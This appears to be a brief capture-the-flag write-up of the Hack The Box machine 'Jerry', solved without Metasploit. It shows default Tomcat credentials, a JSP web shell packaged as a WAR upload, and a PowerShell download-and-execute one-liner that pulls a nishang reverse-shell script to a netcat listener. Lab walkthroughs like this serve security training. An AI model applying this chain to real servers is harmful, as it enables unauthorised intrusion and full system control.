HTB(Jerry) Write UP No Metasploit

Quick write up on Jerry from HTB

nmap -sC -sV

returns tomcat on 8080


Go the and check it out, server status asks for a password. admin:admin works. nothing too crazy there, try going to the manager app link.


admin:admin doesnt work. the 404 page says the default is tomcat:s3cret……clear your cache and that works. Also could be brute forced with hydra. Using SecLists From github, they have wordlist specific to tomcat


If you scroll down you see you can upload war files. i think kali comes with one by default you could try. In this dir /usr/share/webshells/ but i just googled for jsp shells and found this clicked on raw,

curl > cmd.jsp

and was able to download it, server only allows war files, so run this in bash

 zip cmd.war cmd.jsp

upload the file, go to server:8080/cmd/cmd.jsp

and you should see this


whoami shows you have code execution as system, nice. this machine is 64 bit according to page that allows war file uploads


so you have to run 64 bit powershell, googling 64 bit powershell path show this 64 bit version: C:\Windows\System32\WindowsPowerShell\v1.0\ get nishang if you dont already have it > git clone use the following shell found in the nishand Shells Dir Invoke-PowerShellTcp.ps1 edit the script to run the following function along with what port your going to be listening with netcat


Serve the script up with a python http server (i renamed the PS script to shell)

python3 -m http.server 80

set up a netcat listener based on the port you specifed in the powershells script

nc -lvnp 9000

run the following command on the java page

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe IEX (New-Object Net.WebClient).downloadString('')

It runs 64 bit powershell and runs that one line commmand that reads a powershell script, imports the modules and runs the function specified.


You should see that after the command is run also, a GET request on your python webserver. And Last a shell on your netcat listener.



And thats it!